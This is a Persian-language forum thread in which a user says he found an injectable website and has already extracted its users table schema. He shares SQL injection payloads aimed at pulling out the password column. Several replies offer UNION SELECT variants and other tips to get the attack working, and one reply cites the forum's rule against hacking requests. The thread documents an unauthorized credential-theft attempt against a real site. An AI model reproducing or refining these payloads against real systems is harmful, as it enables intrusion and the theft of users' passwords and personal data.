اطلاعیه

Collapse
No announcement yet.

یک مشکل در SQL Injection

Collapse
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • یک مشکل در SQL Injection

    سلام دوستان
    من از یه سایت که مشکل داشت تونستم table و column ها رو بکشم بیرون
    users.uID
    users.userID
    users.firstName
    users.lastName
    users.location
    users.birthday
    users.webAddress
    users.Email
    users.EmailHidden
    users.ExpirationDate
    users.trashed
    users.addUser
    users.addDate
    users.editUser
    users.editDate
    users.phone
    users.userpassword
    users.access
    حالا وقتی از این دستور ها برای گرفتن یورز و پسورد استفاده میکنم برای یوزر جواب می ده ولی برای پسورد هیچ اتفاقی نمی افته و دوباره index لود میشه
    کد PHP:
    'SELECT userpassword FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'users')-- 
    یا
    کد PHP:
    'or 1 = (select TOP 1 userpassword from users)-- 
    و میگه :
    Invalid column name 'userpassword'.
    وجود نداره!!!!!!!
    ممنون می شم اگه راهنمایی کنید

  • #2
    link لطفا
    .................................
    همه مان یک روز بالاخره بر سر این دوراهی خواهیم ایستاد …
    آنجا که همسرمان خواهد گفت : ” یا من ، یا اینترنت ؟! “
    و چه لحظه ی سختی خواهد بود ،
    لحظه جدایی از همسر … !

    Comment


    • #3
      قانون شماره 11:
      11- از ارسال هرگونه درخواست "نفوذ ، هک و ...." ، در فروم پرهیز کنید . پست های با محتوایی همچون " در هک کردن سایت .... کمک کنید " و یا " چطور اینجا رو هک کنم " در صورت مشاهده پاک خواهند شد . همچنین در صورتی که Screen-shot و یا اطلاعاتی را در فروم ، برای درخواست جواب مطرح میکنید ، دقت کنید که IP و Hostname ها و موارد حساسی از این دست ، در محتوای پست شما موجود نباشد.

      لطفا اگر لینک میزارین تو پیغام خصوصی به هم باشه !
      Love Is The Name , F.u.C.k is The Game , Forget The Name , Play The Game !

      خدا بیدار شو یه آشغال باهات حرف داره ! نکنه تو هم به فکره اینی که چی صرف داره ؟!!!

      Comment


      • #4
        آقاي mserm كليپ هاي شما رو در مورد sql injection
        ( يك مقرايش ) رو ديدم
        اگر اينك دريافت براشون بگذاريد خيلي ازتون ممنون مي شم
        چون من با adsl 128 در 20 دقيقه
        موفق به ديدن 5 دقيقه يكي از كليپ هاي شما شدم
        و بعد بطور اشتباهي IE رو بستم و ...
        My Home Page
        All You Need
        WwW.k2-4u.CoM
        ---------------------------------------------------------
        Yahoo avatar = فیلمش سوخت :D
        لینک مستقیم = http://img.msg.yahoo.com/avatar.php?..._4u&format=png

        Comment


        • #5
          فکر نمیکنی دوست عزیز اینجا از پیراموس استفاده کنی بهتره
          AnathemA Hacking Team

          Comment


          • #6
            ببين اين طوري بازم گير ميده...

            union select top 1 userpassword from users

            يا
            union+select+top+1+userpassword+from users

            Comment


            • #7
              چرا گير دادي به اين حالا اينا رو بچسب..

              users.firstName
              users.lastName
              users.Email
              users.addUser
              users.editUser
              users.phone
              users.access

              Comment


              • #8
                این رو قبلا تست کردم ولی جواب نداد
                آخه از اونها هم چند تاشون کار نمی کنه
                بران جالب بود

                Comment


                • #9
                  سلام اگر ايدي خود اون بخش رو بزاري شايد مشکلت حل بشه من روي چند تا از اين پورتال ها مثل پارس ديتا و .. همين مشکل رو داشتم با اينکار بعد از 2 ماه برطرف شد!!
                  آب طلب نکرده، همیشه مراد نیست گاهی نشانه ایست که قربانی ات کنند... !

                  Comment

                  Working...
                  X